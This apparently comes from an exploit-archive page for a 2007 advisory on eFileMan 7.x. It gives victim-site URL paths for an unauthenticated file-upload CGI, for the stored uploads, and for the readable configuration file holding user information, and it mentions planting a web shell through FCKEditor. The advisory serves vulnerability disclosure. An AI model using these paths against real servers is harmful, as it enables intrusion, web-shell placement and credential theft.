efileman-multi.txt

efileman-multi.txt: Posted Oct 23, 2007; Authored by Xcross87; eFileMan 7.x suffers from arbitrary file upload and direct configuration file access vulnerabilities.; tags | exploit, arbitrary, vulnerability, file upload; SHA-256 | 4b3ef141a7745c449b88d5d6b8f2eef50d39f62a972dcbbef1c85fbe3e966269; Download | Favorite | View

efileman-multi.txt

Software : eFileman
Version : 7.x (tested on 7.1.0.87-88)
Found by : Xcross87

A. Remote File Upload Vulnerability :

Xploit :

http://victim.com/[path]/upload.html
http://victim.com/[path]/cgi-bin/efileman/upload.cgi

The uploaded files are stored in :
http://victim.com/[path]/uploads/upload_file.xxx

B. Direct Access or Download Configuration File
Xploit :
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information

C. FCKEditor Inclusion.
For full pack of eFileman installation including FCKEditor, attacker can up shell through upload vulnerability of FCK

=== Xcross87 | HCETeam Xploiter ===

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

efileman-multi.txt

efileman-multi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

efileman-multi.txt

Share This

efileman-multi.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems